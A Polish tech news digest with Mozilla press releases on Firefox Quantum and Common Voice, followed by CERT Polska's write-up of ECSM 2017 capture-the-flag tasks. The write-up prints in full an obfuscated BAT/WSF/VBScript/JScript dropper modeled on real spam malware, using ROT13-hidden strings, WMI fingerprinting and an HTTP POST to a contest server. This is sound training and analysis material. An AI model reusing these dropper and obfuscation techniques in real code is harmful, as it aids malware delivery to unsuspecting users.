  5. Zrzuty ekranu to prawdziwy hit. Zauważamy bardzo wzmożone i wczesne zainteresowanie. Użytkownicy wykonali ponad 30 milionów zrzutów ekranu, od momentu wprowadzenia tej funkcji na rynek pod koniec września.
  6. Developer Support dla Firefox Quantum: zwiększona prędkość i stabilność przeglądarki, a także lepsza jakość narzędzi programistycznych, daje programistom więcej powodów do spróbowania i kontynuacji korzystania z narzędzi Firefox dla programistów. Od 26 września, wydania programistycznej wersji Firefox Quantum, zauważyliśmy 10% wzrost w codziennym korzystaniu z narzędzi programistycznych i 53% wzrost pobierania tej edycji.Oto co świat myśli na temat Firefox Quantum:
  7. W Social Mediach wciąż jest głośno. Przyjemnie było czytać wypowiedzi nowych użytkowników przeglądarki, a jeszcze przyjemniej jest zauważać znaczące, pozytywne wypowiedzi na Facebooku, Twitterze, Reddit, Tumblr, YouTubie i na blogach.
  8. Nasze reklamy. Zastosowaliśmy nietypowe podejście w kwestii marketingowej nowej przeglądarki Firefoksa. Skupiliśmy się na emocjach (a nawet na dźwięku!), jakie wywołuje korzystanie z naszej nowej, szybkiej przeglądarki. To wszystko pojawiło się w spotach telewizyjnych i promowanych wideo z naszym „Wait Face” i teledyskiem Reggiego Wattsa. Oba wideo miały ponad pół miliarda wyświetleń, a jedna trzecia obejrzała filmy od początku do końca.
  9. Firefox w wiadomościach. Napisano ogromną ilość pozytywnych artykułów o nowej przeglądarce Firefoksa. Widzieliśmy setki nagłówków z całego świata m.in.: Wired, El Pais, Usbek & Rica.

Jesteśmy niezmiernie poruszeni ilością pozytywnych reakcji od czasu premiery. Będziemy nadal przyglądać się liczbom i wrócimy do Was z aktualizacją po Nowym Roku!

 

Centrum prasowe Mozilli, 14 grudnia 2017, 09:18

13 grudnia 2017

Dobre programy

CCleaner 5.38 dokładniej sprząta po Chromie i lepiej działa z Edgem

imagePoprzednia wersja CCleanera nauczyła się lepiej sprzątać po Firefoksie i Microsoft Edge, zaś wydana właśnie nowa wersja oznaczona numerem 5.38 bierze się za przeglądarkę Google Chrome, dorzucając niewielką nowość dla użytkowników Edge’a. Ponadto wprowadza jeszcze kilka małych usprawnień. Dostępny jest już CCleaner w wersji 5.38 i jak podają twórcy, ma teraz działać stabilniej. Aktualizacja…
Mateusz Budzeń (Scorpions.B), 13 grudnia 2017, 14:05

Strona rozszerzeń do Firefoksa tonie w spamie i marnych dodatkach

imageNa stronie Mozilli przeznaczonej dla dodatków do Firefoksa (AMO) mamy do czynienia z nietypowym zjawiskiem – pojawia się na niej masa rozszerzeń, które w rzeczywistości są tylko spamem. Linki do kolejnych dodatków mają zachęcać użytkowników do klikania w odnośniki w opisach i pobierania filmów lub seriali, zaś z rozszerzaniem możliwości Firefoksa nie mają wiele wspólnego. Z punktu widzenia…
Oskar Ziomek (o.zio), 13 grudnia 2017, 13:32

11 grudnia 2017

Dobre programy

SiteDelta Highlight i Watch: rozszerzenia wskażą zmiany na stronach

image SiteDelta Watch i SiteDelta Highlight to rozszerzenia dla Chrome'a i Firefoksa, które przydadzą się przy monitorowaniu zmian na stronach. Choć działają podobnie, przydadzą się w różnych scenariuszach – SiteDelta Watch monitoruje zmiany na stronach automatycznie, zaś SiteDelta Highlight dokładniej analizuje strony i wskazuje zmiany, ale wymaga ręcznego załadowania każdej z nich. SiteDelta…
Anna Rymsza (Xyrcon), 11 grudnia 2017, 20:08

1 grudnia 2017

Dobre programy

Porażka NoScript jako WebExtension – dodatek zbiera negatywne opinie

imageW ubiegłym tygodniu informowaliśmy o ostatecznym wydaniu popularnego rozszerzenia NoScript jako WebExtension – wersji przeznaczonej dla Firefoksa 57 Quantum. Już wtedy wiadomo było, że dodatek ma być dalej rozwijany, bo nie odwzorowuje jeszcze pełnej funkcjonalności poprzednika, ale wymagania użytkowników przerosły możliwości twórców i od kilku dni rozszerzenie zbiera niemal wyłącznie negatywne…
Oskar Ziomek (o.zio), 1 grudnia 2017, 18:35

Firefox 58 Beta dla Androida: FLAC i skróty do Progressive Web Apps

imageDo użytkowników Androida korzystających z edycji Beta przeglądarki Firefox, trafia jej najnowsza, 58 wersja. Przynosi kilka istotnych zmian, w tym możliwość przypinania skrótów do aplikacji progresywnych na pulpicie, dzięki czemu jeszcze bardziej zatarta zostanie różnica pomiędzy pełną aplikacją, a mobilną wersją strony. Poza tym pojawiła się także obsługa formatu FLAC oraz nowe języki. Od…
Oskar Ziomek (o.zio), 1 grudnia 2017, 11:38

30 listopada 2017

Dobre programy

Mozilla właśnie oddała najlepsze techniki rozpoznawania mowy w ręce programistów

imageAlexa, Cortana, Siri, ten google’owy asystent, który nie ma żadnego dobrego imienia – patrząc na to wszystko, co stało się przez ostatnie lata w dziedzinie maszynowego przetwarzania ludzkiej mowy, można by było pomyśleć, że żyjemy już w czasach, w których z komputerami rozmawia się jak w Star Treku. A po pomyśleniu sięgnąć po klawiaturę i myszkę, by pisać, klikać i patrzeć na efekty. Choć…
Adam Golański (eimi), 30 listopada 2017, 22:06

Centrum prasowe Mozilli

Common Voice – Mozilla udostępnia drugi co do wielkości zbiór danych głosowych

Od startu inicjatywy Common Voice zebraliśmy setki tysięcy próbek głosu za pośrednictwem naszej strony internetowej i aplikacji iOS. Dziś udostępniamy pierwszą wersję tej kolekcji głosów.

Od początku Mozilla opierała się na kreatywności, współczuciu i zaradności ludzi na całym świecie, którzy pomagali nam budować i promować sieć jako globalne zasoby publiczne dostępne dla wszystkich. Stanowiło to podstawę naszej eksperymentalnej pracy w dziedzinie systemów uczących się i rozpoznawania mowy oraz budowania obszernej bazy wysokiej jakości danych głosowych za pomocą Common Voice.

Zbiór ten zawiera blisko 400 000 nagrań od 20 000 różnych osób, co daje około 500 godzin wypowiedzi. Do tej pory jest to drugi co do wielkości ogólnodostępny zestaw danych głosowych, o którym wiemy, a ludzie na całym świecie cały czas dodają i sprawdzają nowe próbki!

Możesz pobrać dane już teraz!

Sami przekonaliśmy się jak trudno jest znaleźć publicznie dostępne dane do naszej pracy w zakresie technologii mowy, dlatego udostępniamy linki do wszystkich innych znanych nam źródeł. Chcemy dalej rozwijać naszą stronę tak, aby stała się centralną bazą danych głosowych.

Patrząc na dzisiejszy ekosystem głosu, widzimy wielu programistów, twórców, start-upowców i badaczy, którzy chcą eksperymentować i budować technologie głosowe. Większość z nas ma jednak dostęp jedynie do dość ograniczonego zbioru danych głosowych. Jest to niezbędny element tworzenia wysokiej jakości silników rozpoznawania mowy. Te dane głosowe mogą kosztować dziesiątki tysięcy dolarów, a ich skala jest niewystarczająca do opracowania rozwiązań w zakresie rozpoznawania mowy na poziomie oczekiwanym przez ludzi. Dostarczając ten nowy zbiór danych publicznych, chcemy pomóc przezwyciężyć te bariery i ułatwić tworzenie nowych, lepszych systemów rozpoznawania mowy (takich jak nasza własna funkcja Deep Speech). Zaczęliśmy od języka angielskiego, ale wkrótce będziemy wspierać każdy język. Mamy nadzieję, że dzięki naszej równoległej pracy nad mechanizmem speech-to-text, uda nam się udostępnić technologię mowy większej liczbie osób, które będą mogły wprowadzać innowacje i konkurować z większymi graczami.

Czy jesteś zainteresowany naszym ogólnodostępnym projektem rozpoznawania mowy „Deep Speech” oraz wykorzystaniem zasobów Common Voice do tworzenia lepszych produktów?  Reuben Morais z zespołu Mozilla Machine Learning właśnie opublikował artykuł pt. „Journey to <10% Word Error Rate”. Stanowi on ciekawe podsumowanie wyzwań i wniosków zebranych podczas pracy nad stworzeniem pierwszego modelu mechanizmu rozpoznawania mowy open source, który został dziś opublikowany w repozytorium github!

W dalszym ciągu przyjmujemy chętnych do pracy nad projektem Common Voice. Prosimy o przesyłanie pomysłów jak możemy współpracować, tak abyśmy wiedzieli, w jaki sposób korzystacie z danych. Czekamy również na sugestie, w jaki sposób ten projekt może być jeszcze bardziej przydatny.

Chcielibyśmy podziękować Mycroft, SNIPS, Bangor University, LibriSpeech, VoxForge, TED-LIUM, Tatoeba.org, Mythic, SAP oraz wszystkim współtwórcom z github. Nie udałoby nam się bez Was!

Stale dążymy do poprawy jakości naszego zbioru danych. Wejdź na stronę internetową Common Voice i pomóż nam zweryfikować nagrania, co jest równie ważne jak przekazywanie głosu!

Centrum prasowe Mozilli, 30 listopada 2017, 07:27

28 listopada 2017

CERT Polska

Rozwiązania zadań z konkursu Capture The Flag w ramach ECSM 2017

Na koniec października, czyli wybranego przez Komisję Europejską oraz ENISA miesiąca poświęconego bezpieczeństwu teleinformatycznemu, zorganizowaliśmy mały konkurs typu Capture The Flag.

Na zakończenie konkursu mamy przyjemność zaprezentować zwycięzców:

Gratulujemy zwycięzcom, a wszystkim dziękujemy za udział w konkursie!

Chętni nadal mogą rozwiązać zadania na stronie ecsm2017.cert.pl.


Poniżej odnośniki do opisów rozwiązań poszczególnych zadań:


Czerwony Exploit

Zadanie

Dostajemy plik cyber.zip, w którym znajduje się plik cyber.exe. Nie pokazuje niczego oczywistego po uruchomieniu, więc jedyne co można z nim zrobić, to załadować do deasemblera (względnie dekompilatora).

Zaczynamy więc:

Program jest na tyle miły, że wita się z nami, wywołuje jakąś funkcję i żegna się.

Zobaczmy więc co znajduje się w tej funkcji.

Może nie być widać na pierwszy rzut oka, ale pętla z prawej strony to po prostu operacja xor z 0x1F – czyli cały ten kod sprowadza się do pobrania nazwy użytkownika i sprawdzenia czy po operacji xor jest równa nazwie z lewej strony. Jeśli tak, to wywoływana jest kolejna funkcja, jeśli nie, to program kończy działanie.

Łatwo odzyskać z tego wymaganą nazwę użytkownika – jest to RedaktorCyberobrona.

Idźmy więc do kolejnej funkcji:

Metoda analogiczna jak poprzednio – tylko zamiast nazwy użytkownika jest sprawdzana nazwa komputera, i zamiast operacji xor z 0x1F jest operacja sub 0x2.

Tym razem deszyfruje się ona do: CYBEROBRONA24.

Ponownie, w razie sukcesu wywoływana jest kolejna funkcja, więc popatrzmy na nią:

Trochę podobna do poprzednich funkcji, ale jednak inna.

Zaczyna się od długiej funkcji sub_40181A, której analizę pominiemy – ze stałych w niej zawartych można się domyślić, że wykonuje zapytanie do infiltrator na serwerze „C&C”, a trochę reversowania mówi, że port to 6012.

Następnie pobierana jest nazwa użytkownika i poddawana operacji xor z 0x99 – ale tym razem program nie sprawdza czy wynik jest poprawny! Zamiast tego wywołuje funkcję sub_4019F6 z nazwą użytkownika (po operacji xor), oraz pobranymi danymi.

Co kryje się w tej funkcji?

Jakaś metoda szyfrowania (tak naprawdę – kolejna operacja xor).
Nie ma to jednak znaczenia, skoro możemy podstawić po prostu znaną nam poprawną nazwę użytkownika i odszyfrować dane poprawnie.

Następnie w programie dane są parsowane, ale to nie jest wcale konieczne w przypadku rozwiązywania zadania – łatwo w zdeszyfrowanych danych spostrzec ciekawy fragment:

ecsm{czerwony_cyberatak_z_czerwonego_cyberwschodu}

Fałszywa faktura

Etap 1: Plik BAT

Na stronie zadania znajduje się link do rzekomej faktury. W spakowanym pliku w formacie ZIP można znaleźć plik wykonywalny Invoice_EC2455321.bat. Według opisu zadania: rolą tego pliku jest pobranie złośliwego oprogramowania na komputer ofiary. Udaje się to jednak tylko w przypadku konkretnego użytkownika.

Po otwarciu pliku .bat widzimy skrypt Windows Batch File, który po poleceniu exit zawiera skrypt w innym formacie.

@echo off
setlocal enableDelayedExpansion
set counter=1
set outpath="%temp%\ecsm"
set outfile="%temp%\ecsm\enjoy.wsf"
mkdir %outpath% 2>nul
set infile=%~n0%~x0
for /f "tokens=1 delims=:" %%a in ('findstr /n /b exit %infile%') do (
    set /A startline=%%a
    goto ok
)
:ok
more +!startline! %infile% > %outfile%
pushd %outpath% & cscript enjoy.wsf & popd
exit /b
''; /* <!--
Dim hope: Set hope = Nothing: Dim weakened: [...]

Na samym początku tworzony jest folder ecsm w TEMP. Ustawiane są też odpowiednie ścieżki w zmiennych środowiskowych m.in. outpath wskazujący na plik enjoy.wsf w utworzonym folderze i infile wskazujący na aktualnie wykonywany skrypt – %~n0%~x0. W Batchu %~n0 zwraca nazwę pliku bez ścieżki i rozszerzenia, a %~x0 zwraca rozszerzenie.

Następnie znajdowana jest linia zawierająca exit. Przy pomocy polecenia more cała zawartość znajdująca się za poleceniem exit kopiowana jest do pliku enjoy.wsf. Ostatecznie skopiowany plik WSF uruchamiany jest z użyciem cscript.

Etap 2: Plik WSF

Windows Script File (WSF) jest jednym z licznych formatów wspieranych przez silnik Windows Script Host. Pozwala na budowanie złożonych skryptów wykorzystujących kilka języków skryptowych (m.in. JScript i VBScript). Pliki WSF opisywane są przy użyciu XML. Używając różnego rodzaju znaczników możemy podzielić skrypty na zadania (<job>), importować zewnętrzne stałe (<reference>), opisywać argumenty wywołania (<runtime>) itp.

Na tym etapie wykorzystane zostały dwie cechy formatu:

Skrypty w poszczególnych językach ładowane są na samym końcu opisywanego pliku:

''; /* --> <package> <job id="RickRolled">
' <script language="VBScript" src="./enjoy.wsf"> </script>
' <script language="JScript" src="./enjoy.wsf"> </script> </job> </package>
' */

Znaczniki zawarte w WSF ładują ten sam plik kolejno jako VBScript i jako JScript. Co ważne: w tak załadowanym skrypcie – obiekty pochodzące z wykonania pliku VBScript będą widoczne dla JScript (oba skrypty współdzielą global scope co pozwala wykorzystywać właściwości jednego języka w innym).

Do załadowania obu skryptów w ten sposób wymagana jest przewidywalna nazwa pliku – taką nazwę zapewnia etap 1.

Etap 3: Skrypt VBS

Dim hope: Set hope = Nothing
Dim weakened: Set weakened = Nothing
Dim innocent: Set innocent = Nothing
Function silence(plValue, pbBits)
    silence = plValue \ (2 ^ pbBits)
End Function

Dim reason: reason = "MSXML2.XMLHTTP"

Class Clever
    Private Sub Class_Initialize()
        ' Otwarcie pliku enjoy.wsf przy tworzeniu obiektu Clever
        If innocent Is Nothing Then
            Set innocent = img.src
            innocent.Type = 1
            innocent.Open
            innocent.LoadFromFile("./enjoy.wsf")
        End If
    End Sub
    Private Sub Class_Terminate():
        ' Destruktor dla obiektu Clever, ktory ustawia zmienna hope na wartosc zwracana z hate()
        ' Przy destrukcji: hope = hope ROL 1
        hope = hate()
    End Sub
    Private Sub Class_Destroy(): hope = ( hate() * 2 ) Xor &HFFFFFFFF: End Sub
    Private Sub Class_Finish(): hope = whispering("love"): End Sub
End Class

Function whispering(justice):
    ' whispering(justice) -> crc32(data)
    Dim joy, honest, sharing, l, valuable
    joy = "&h0,&h77073096,&hEE0E612C,&h990951BA,&h076DC419,&h706AF48F,&hE963A535,&h9E6495A3,&h0EDB8832,&h79DCB8A4,&hE0D5E91E,&h97D2D988,&h09B64C2B,&h7EB17CBD,&hE7B82D07,&h90BF1D91,&h1DB71064,&h6AB020F2,&hF3B97148,&h84BE41DE,&h1ADAD47D,&h6DDDE4EB,&hF4D4B551,&h83D385C7,&h136C9856,&h646BA8C0,&hFD62F97A,&h8A65C9EC,&h14015C4F,&h63066CD9,&hFA0F3D63,&h8D080DF5,&h3B6E20C8,&h4C69105E,&hD56041E4,&hA2677172,&h3C03E4D1,&h4B04D447," _
        + "&hD20D85FD,&hA50AB56B,&h35B5A8FA,&h42B2986C,&hDBBBC9D6,&hACBCF940,&h32D86CE3,&h45DF5C75,&hDCD60DCF,&hABD13D59,&h26D930AC,&h51DE003A,&hC8D75180,&hBFD06116,&h21B4F4B5,&h56B3C423,&hCFBA9599,&hB8BDA50F,&h2802B89E,&h5F058808,&hC60CD9B2,&hB10BE924,&h2F6F7C87,&h58684C11,&hC1611DAB,&hB6662D3D,&h76DC4190,&h01DB7106,&h98D220BC,&hEFD5102A,&h71B18589,&h06B6B51F,&h9FBFE4A5,&hE8B8D433,&h7807C9A2,&h0F00F934,&h9609A88E,&hE10E9818," _
        + "&h7F6A0DBB,&h086D3D2D,&h91646C97,&hE6635C01,&h6B6B51F4,&h1C6C6162,&h856530D8,&hF262004E,&h6C0695ED,&h1B01A57B,&h8208F4C1,&hF50FC457,&h65B0D9C6,&h12B7E950,&h8BBEB8EA,&hFCB9887C,&h62DD1DDF,&h15DA2D49,&h8CD37CF3,&hFBD44C65,&h4DB26158,&h3AB551CE,&hA3BC0074,&hD4BB30E2,&h4ADFA541,&h3DD895D7,&hA4D1C46D,&hD3D6F4FB,&h4369E96A,&h346ED9FC,&hAD678846,&hDA60B8D0,&h44042D73,&h33031DE5,&hAA0A4C5F,&hDD0D7CC9,&h5005713C,&h270241AA," _
        + "&hBE0B1010,&hC90C2086,&h5768B525,&h206F85B3,&hB966D409,&hCE61E49F,&h5EDEF90E,&h29D9C998,&hB0D09822,&hC7D7A8B4,&h59B33D17,&h2EB40D81,&hB7BD5C3B,&hC0BA6CAD,&hEDB88320,&h9ABFB3B6,&h03B6E20C,&h74B1D29A,&hEAD54739,&h9DD277AF,&h04DB2615,&h73DC1683,&hE3630B12,&h94643B84,&h0D6D6A3E,&h7A6A5AA8,&hE40ECF0B,&h9309FF9D,&h0A00AE27,&h7D079EB1,&hF00F9344,&h8708A3D2,&h1E01F268,&h6906C2FE,&hF762575D,&h806567CB,&h196C3671,&h6E6B06E7," _
        + "&hFED41B76,&h89D32BE0,&h10DA7A5A,&h67DD4ACC,&hF9B9DF6F,&h8EBEEFF9,&h17B7BE43,&h60B08ED5,&hD6D6A3E8,&hA1D1937E,&h38D8C2C4,&h4FDFF252,&hD1BB67F1,&hA6BC5767,&h3FB506DD,&h48B2364B,&hD80D2BDA,&hAF0A1B4C,&h36034AF6,&h41047A60,&hDF60EFC3,&hA867DF55,&h316E8EEF,&h4669BE79,&hCB61B38C,&hBC66831A,&h256FD2A0,&h5268E236,&hCC0C7795,&hBB0B4703,&h220216B9,&h5505262F,&hC5BA3BBE,&hB2BD0B28,&h2BB45A92,&h5CB36A04,&hC2D7FFA7,&hB5D0CF31," _
        + "&h2CD99E8B,&h5BDEAE1D,&h9B64C2B0,&hEC63F226,&h756AA39C,&h026D930A,&h9C0906A9,&hEB0E363F,&h72076785,&h05005713,&h95BF4A82,&hE2B87A14,&h7BB12BAE,&h0CB61B38,&h92D28E9B,&hE5D5BE0D,&h7CDCEFB7,&h0BDBDF21,&h86D3D2D4,&hF1D4E242,&h68DDB3F8,&h1FDA836E,&h81BE16CD,&hF6B9265B,&h6FB077E1,&h18B74777,&h88085AE6,&hFF0F6A70,&h66063BCA,&h11010B5C,&h8F659EFF,&hF862AE69,&h616BFFD3,&h166CCF45,&hA00AE278,&hD70DD2EE,&h4E048354,&h3903B3C2," _
        + "&hA7672661,&hD06016F7,&h4969474D,&h3E6E77DB,&hAED16A4A,&hD9D65ADC,&h40DF0B66,&h37D83BF0,&hA9BCAE53,&hDEBB9EC5,&h47B2CF7F,&h30B5FFE9,&hBDBDF21C,&hCABAC28A,&h53B39330,&h24B4A3A6,&hBAD03605,&hCDD70693,&h54DE5729,&h23D967BF,&hB3667A2E,&hC4614AB8,&h5D681B02,&h2A6F2B94,&hB40BBE37,&hC30C8EA1,&h5A05DF1B,&h2D02EF8D"
    honest = Split(joy, ",")
    valuable = Len(justice) : sharing = &HFFFFFFFF
    For l = 1 To valuable:                  
        sharing = honest(((sharing And &HFFFF) Xor Asc(Mid(justice, l, 1))) And &HFF) Xor silence(sharing, 8)
    Next
    sharing = sharing Xor &HFFFFFFFF
    whispering = sharing
End Function

' Wrapper, ktory pozwala konstruowac obiekty Clever z poziomu JScript
Function CallObject(sincerely): Set CallObject = New Clever: End Function

' ExecuteGlobal z curious
Function CreateDOMElement(faith):
    Dim x, y, z: Set y = Nothing
    faith = 0
    x = faith + 25 Xor &HFFFFFFFF
    y = x And &HFFFFFFFF Or 0 + 2555
    ' Tworzy obiekt Excited
    Set CreateDOMElement = new Excited
    z = x
    y = z
End Function


Function curious()
    ' ExecuteGlobal - Function CreateDOMElement....
    curious = silence("&H1836e", 5)
End Function

Dim img: img = curious()

' Wrapper wykorzystujacy getter do wywolania WScript.CreateObject
Class Excited
    Private wonderful
    Public Property Get src ( ): Set src = CreateObject ( wonderful ): End Property
    Public Property Let src ( nice ): wonderful = nice: End Property
End Class

' Stworzenie obiektu ADODB.Stream
Set img = CreateDOMElement("img")
img.src = "ADODB.Stream"
' Stworzenie obiektu Clever
Set weakened = New Clever

Function hate()
    ' RollLeft(hope, 1)
    ' Zwraca wartosc 'hope' obrocona bitowo w lewo o jeden bit
    Dim support, dislike, i
    dislike = hope
    Select Case VarType(dislike)
        Case vbLong
            support = (dislike And "&H3FFFFFFF") * 2
            If dislike And "&H40000000" Then support = support Or "&H80000000"
            If dislike And "&H80000000" Then support = support Or "&H1"
            support = CLng(support)
        Case vbInteger
            support = (dislike And "&H3FFF") * 2
            If dislike And "&H4000" Then support = support Or "&H8000"
            If dislike And "&H8000" Then support = support Or "&H1"
            support = CInt("&H"+ Hex(support))
        Case vbByte
            support = (dislike And "&H7F") * 2
            If dislike And "&H80" Then support = support Or "&H1"
            support = CByte(support)
    End Select
    hate = CLng(support)
End Function

' Zaladowanie do hope sumy CRC pliku 'enjoy.wsf'
hope = whispering(innocent.Read())

Plik wykorzystuje pewną specyficzną właściwość składni komentarzy obu języków skryptowych.

W przypadku VBS – linia komentarza rozpoczyna się apostrofem:

' komentarz vbscript
WScript.echo("hello world")
' /* komentarz jscript */

Dla języka JScript – apostrof stanowi znak rozpoczynający/kończący łańcuch znaków.

' komentarz vbscript
WScript.echo("hello world")
'
/* komentarz jscript */

Mieszanie obu rodzajów komentarzy pozwala przygotować plik, który poprawnie wykona się z użyciem interpreterów obu języków.

Zauważając, że wykomentowane sekcje VBScript zaczynają się od apostrofu – możemy pozyskać kod VBS pozbywając się wszystkich komentarzy:
sed -e "s/'.*//" enjoy.wsf > enjoy.vbs

Teraz możemy podjąć się deobfuskacji (niestety do VBScript ma zbyt wielu narzędzi, które pozwoliłyby uprościć ten proces). Elementy Execute i ExecuteGlobal możemy podejrzeć poprzez skopiowanie ich do osobnego pliku, podmienienie ich na WScript.echo i zwykłe wykonanie tych linii przy użyciu cscript.

Po analizie możemy zauważyć następujące elementy:

Oznacza to, że dowolna modyfikacja kodu może skończyć się wygenerowaniem innej sumy kontrolnej. Aby trudniej było odtworzyć zachowanie funkcji – posłużono się nietypowym wielomianem CRC, zaś sama wartość jest w kilku miejscach niejawnie (w destruktorze) modyfikowana.

Co więcej – okazuje się, że wykorzystana implementacja operacji ROL nie jest do końca poprawna.

Całość sprawia, że samodzielne wyliczenie poprawnej wartości staje się wyjątkowo trudne. Warto wykorzystać oryginalną implementację.

Etap 4: Skrypt JS

Kolejnym wykonywanym elementem jest skrypt w języku JScript. Kod możemy pozyskać posługując się dowolnym narzędziem do reformatowania kodu JavaScript (np. jsbeautifier.org) i wycinając zbędne elementy.

var myself = CallObject("SELF_PROCESS");

var arr = [1, 0x24312313, "./enjoy.wsf",
           function Object.prototype.toString() {
                return CallObject("VBOX_CHECK"), arr[4].src["SvyrRkvfgf".toLower()](arr[2])
           }, CreateDOMElement("a")];
var brr = ["enjoy".toUpper(this),
           (arr[4].src = "Scripting.FileSystemObject"),
           function showFear() {
                return WScript.CreateObject("JFpevcg.Argjbex".toLower())["HfreAnzr".toLower()]
           }, {
            "hey": "handsome"
           }.toString(), showFear()];

function onceAgain(d) {
    for (var k in d) {
        if (brr[k] !== d[k]) {
            (veryWell().Run("uggcf://lbhgh.or/qDj4j9JtKpD".toLower()), true) && veryUgly();
        }
    }
};

onceAgain(({
    0: "prr7pqr4",
    1: false,
    2: "enjoy"
}, {
    3: "hate",
    4: "PLORE-ERQNXPWN"
}, {
    0: "prr7pqr4".toLower(),
    3: true,
    4: "PLORE-ERQNXPWN".toLower()
}))

var setWindow = (function String.prototype.toUpper(th) {
    var SWBem = new th["NpgvirKBowrpg".toLower()]("JorzFpevcgvat.FJorzYbpngbe".toLower());
    var imw = SWBem["PbaarpgFreire".toLower()](".", "/ebbg/PVZI2".toLower());
    CallObject("HI HELLO!")
    var colItems = imw["RkrpDhrel".toLower()]("FRYRPG * SEBZ Jva32_YbtvpnyQvfx Jurer QrivprVQ = 'P:'".toLower());
    var e = new th["Rahzrengbe".toLower()](colItems);
    CallObject("LOVE_FROM_BEST_KOREA");
    for (CallObject("CRYPT_GEN_KEY"); !e.atEnd(); e.moveNext()) {
        return e.item()["IbyhzrFrevnyAhzore".toLower()].toLowerCase();
    }
    return "";
});

function veryWell() {
    return (WScript["CreateObject"]("JFpevcg.Furyy".toLower()));
}

function veryUgly() {
    this["JFpevcg".toLower()]["Dhvg".toLower()](1);
}

var fixit = [(function Number.prototype.checkValue() {
    return this == 1337;
}), (/([A-Z])+/g), (function String.prototype.toLower() {
    return this.replace(/([A-Ma-m])|([N-Zn-z])/g, function(m, p1, p2) {
        return String.fromCharCode(m.charCodeAt(0) + (p1 ? 13 : -13));
    });
})];

function Serenade() {
    var bestkorea = this["JFpevcg".toLower()]["PerngrBowrpg".toLower()]("ZFKZY2.KZYUGGC".toLower());
    'Serenade();';
    bestkorea["Bcra".toLower()]("CBFG".toLower(), "uggc://rpfz2017.preg.cy:6015/ncv/".toLower(), false);
    myself = null;
    bestkorea["Fraq".toLower()](showFear() + "|V|" + hope);
    if (bestkorea["ErfcbafrGrkg".toLower()].substr(0, 4) === "rpfz".toLower()) this["JFpevcg".toLower()]["rpub".toLower()](bestkorea["ErfcbafrGrkg".toLower()]);
    else {
        (veryWell().Run("uggcf://lbhgh.or/4_b47Tf6QD0".toLower()), true) && veryUgly();
    }
}
Serenade();
Deobfuskacja łańcuchów znaków

Na początek przyjrzyjmy się łańcuchom znaków:

function onceAgain(d) {
    for (var k in d) {
        if (brr[k] !== d[k]) {
            (veryWell().Run("uggcf://lbhgh.or/qDj4j9JtKpD".toLower()), true) && veryUgly();
        }
    }
};

Względnie łatwo zauważyć, że jest tutaj wykorzystywany algorytm ROT13. Implementacja znajduje się w tym miejscu:

var fixit = [(function Number.prototype.checkValue() {
    return this == 1337;
}), (/([A-Z])+/g), (function String.prototype.toLower() {
    return this.replace(/([A-Ma-m])|([N-Zn-z])/g, function(m, p1, p2) {
        return String.fromCharCode(m.charCodeAt(0) + (p1 ? 13 : -13));
    });
})];

Jakim cudem to działa? Ta konstrukcja wykorzystuje dwa elementy: Hoisting deklaracji funkcji i mechanizm prototypów.

Oba elementy języka są powszechnie wykorzystywane w JavaScript, ale nigdy jednocześnie. Deklaracja function A.prototype.B(...) {} nie jest zgodna ze składnią ECMAScript i jest specyficzna wyłącznie dla języka JScript. Pozwala to na określanie/przeciążanie metod dla obiektów String/Object/itd. w dowolnym miejscu scope’a.

Fakt niezgodności niesie za sobą dodatkowy problem – spora część parserów zgodnych z ES nie będzie w stanie poprawnie przeanalizować kodu zawierającego takie wyrażenia. Dotyczy to m.in. UglifyJS i (do niedawna) emulatora box-js – Pull request dla box-js wprowadzający wsparcie dla function A.B.

ROT13 możemy prosto zdekodować poniższym skryptem (Node.js):

var fs = require("fs");
var code = fs.readFileSync("writeup-enjoy.js").toString()
var deobfuscated = code.replace(/"(.+?)"\.toLower\(\)/g, (function(m, txt) {
        var replaced = txt.replace(/([A-Ma-m])|([N-Zn-z])/g, function(m, p1, p2) {
            return String.fromCharCode(m.charCodeAt(0) + (p1 ? 13 : -13));
        })
        return '"'+replaced+'"'
    }));
fs.writeFileSync("enjoy.deobf.js", deobfuscated);
Make droppers great onceAgain!

Pierwszym interesującym elementem jaki rzuca się w oczy po deobfuskacji jest wywołanie onceAgain:

function onceAgain(d) {
    for (var k in d) {
        if (brr[k] !== d[k]) {
            (veryWell().Run("https://youtu.be/dQw4w9WgXcQ"), true) && veryUgly();
        }
    }
};

onceAgain(({
    0: "prr7pqr4",
    1: false,
    2: "enjoy"
}, {
    3: "hate",
    4: "PLORE-ERQNXPWN"
}, {
    0: "cee7cde4",
    3: true,
    4: "CYBER-REDAKCJA"
}))

Funkcja sprawdza, czy wartości pod poszczególnymi kluczami argumentu zgadzają się z wartościami w tablicy brr. W razie niezgodności – otwierane jest okno przeglądarki z rickrollem a sam skrypt jest zamykany (veryUgly()).

Poszczególne elementy tablicy brr zawierają następujące infomacje:

Jeśli onceAgain wykona się poprawnie, przechodzimy do wywołania Serenade.

Funkcja Serenade

Funkcja Serenade wygląda następująco:

function Serenade() {
    var bestkorea = this["WScript"]["CreateObject"]("MSXML2.XMLHTTP");
    'Serenade();';
    bestkorea["Open"]("POST", "http://ecsm2017.cert.pl:6015/api/", false);
    myself = null;
    bestkorea["Send"](showFear() + "|V|" + hope);
    if (bestkorea["ResponseText"].substr(0, 4) === "ecsm") this["WScript"]["echo"](bestkorea["ResponseText"]);
    else {
        (veryWell().Run("https://youtu.be/4_o47Gs6DQ0"), true) && veryUgly();
    }
}

Jej zadaniem jest pobranie z serwera poszukiwanej przez nas „próbki” – w tym wypadku flagi rozpoczynającej sie od „ecsm”. W tym celu wykonywane jest żądanie POST pod adres http://ecsm2017.cert.pl:6015/api/. Żądanie ma następujący format: <nazwa uzytkownika>|V|<suma kontrolna (ze znakiem)>
Jeśli zostaną przesłane poprawne dane – endpoint zwróci flagę. W przeciwnym wypadku – kod 404 co skończy się uruchomieniem kolejnego „rickrolla”.

Etap 5: Rozwiązanie

Dotarliśmy do końca analizy. Docelowe rozwiązanie wygląda następująco:

Ważne jest, aby całość wykonać robiąc jak najmniej zmian – w niektórych miejscach w kodzie wyzwalany jest destruktor Clever. Aby suma była poprawna, musi być wywołany odpowiednią liczbę razy.

Dlaczego?

Idea działania dropperów jest względnie prosta – są to pliki wykonywalne, których głównym zadaniem jest pobranie i instalacja złośliwego oprogramowania. Zdarza się jednak, że prostota idzie w parze z silną obfuskacją i licznymi utrudnieniami w analizie. Przy tworzeniu tego zadania część sztuczek została zaczerpnięta z prawdziwych złośliwych skryptów, które pojawiają się w spamie.

